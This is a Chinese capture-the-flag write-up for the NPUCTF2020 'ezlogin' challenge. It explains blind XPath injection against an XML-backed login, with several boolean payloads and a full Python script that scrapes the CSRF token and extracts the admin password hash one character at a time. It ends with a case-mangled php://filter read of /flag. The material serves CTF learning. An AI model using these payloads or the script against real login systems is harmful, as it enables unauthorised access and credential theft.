[NPUCTF2020]ezlogin xPATH注入

根据题目意思应该是获取到密码即可，账号肯定是admin或者adm1n等常用管理员账号了

会发现有时间限制，过一小会儿就必须要刷新一下，于是抓包看一下

 

可以看到是xml的格式，有token验证，一开始我就以为是携带token的xml注入了，结果发现并不是，这里考的是xPath注入

服务端用户名和密码通过xml文件存储，通过将提交的用户名和密码拼接到xPATH中进行查询

后台语法：

//root/accounts/user[username/text()=$username and password/text()=$password]

根据大佬的资料以及wp学习，xPATH注入的过程需要先获取根下节点个数，然后获取跟下面的节点个数，然后获取根下节点名

这样构造的原因是：

 

//root/accounts/user[username/text()=$username and password/text()=$password]
$username肯定是一个字符串格式，因此是""
我们要自己可以控制的话，先"闭合前面那个双引号
然后中间利用or语句进行盲判断 or ……
因为后面还有一个双引号 再加一个or ""="来进行空字符串判断为真，因此我们中间控制的语句决定着返回1还是0

'or count(/*)=1  or ''='    #非法操作
'or count(/*)=2  or ''='    #用户名或密码错误

通过count(/)获取根下节点个数，可以知道是有一个节点 

 

# 获取节点名长度
'or string-length(name(/*[1]))=4 or ''='
# bool注入获取节点
'or substring(name(/*[1]), 1, 1)='a'  or ''='

知道怎么判断后就利用大佬的脚本

import requests
import string
import time
import re
session = requests.session()
base_url = 'http://932f9bbf-355d-423a-ada1-fab454456dca.node4.buuoj.cn:81/'
success = '??'
payload = "' or substring({target},{index},1)='{char}' or '"#注入模板
 
chars = string.ascii_letters+string.digits#所有数字字符
 
 
def get_csrf():
    res = session.get(base_url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36',
                                         'Cookie': 'PHPSESSID=8ad6c1a25ba4ac37acaf92d08f6dc993'}).text#返回请求的文本
    return re.findall('<input.*value="(.*?)"./>', res)[0]#利用正则获取到token的值
 
 
target = 'string(/*[1]/*[1]/*[2]/*[3])'#遍历出叶子节点
# username adm1n
# password cf7414b5bdb2e65ee43083f4ddbc4d9f
data = '<username>{username}</username><password>1</password><token>{token}</token>'#伪造格式
 
result = 'cf7414b5bdb2e65ee43'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36',
           'Content-Type': 'application/xml',
           'Cookie': 'PHPSESSID=8ad6c1a25ba4ac37acaf92d08f6dc993'}#伪造请求头
for i in range(20, 35):#这里因为脚本已经给出了前19位，所以从20位开始，如果没有前面的result，我们应该是range(1,35)，后面任取，大一点好
    for j in chars:#每一位进行破解
        time.sleep(0.2)#防止429
        temp_payload = payload.format(target=target, index=str(i), char=j)#注入模板字符串格式化
 
        token = get_csrf()#token值
 
        temp_data = data.format(username=temp_payload, token=token)#数据已经准备就绪username以及token，不用password是因为后面有一个or，有一个为真即可
        res = session.post(url=base_url+'login.php',
                           data=temp_data, headers=headers)#请求头 请求数据 请求地址
        # print(temp_data)
        # print(res.text)
        # print(len(res.text))
        if len(res.text) == 5:#因为成功的时候返回非法操作！ 五个字符，因此利用判断，其实也可以用字符串包含
            result += j
            break
    print(result)

中间token是在html属性里面，利用查找标签属性过滤即可

 代码审查已经注释了，最后获得账号密码：

adm1n
cf7414b5bdb2e65ee43083f4ddbc4d9f

账号自己改一下节点名称也就获得了，基本上就那几个

一开始我直接用这个密码去登陆了，发现不对

xml文件存储的密码一般都是md5加密的，因此我们还需要解密

gtfly123

 进去后f12可以发现

明显base64 

观察参数有一个file，应该是利用伪协议读取

php://filter/read=convert.base64-encode/resource=/flag 发现返回nonono被过滤了
因此将常用的一些字符进行大写化
?file=Php://filter/rEad=convert.basE64-encode/resource=/flag

 f12发现又是一个base64加密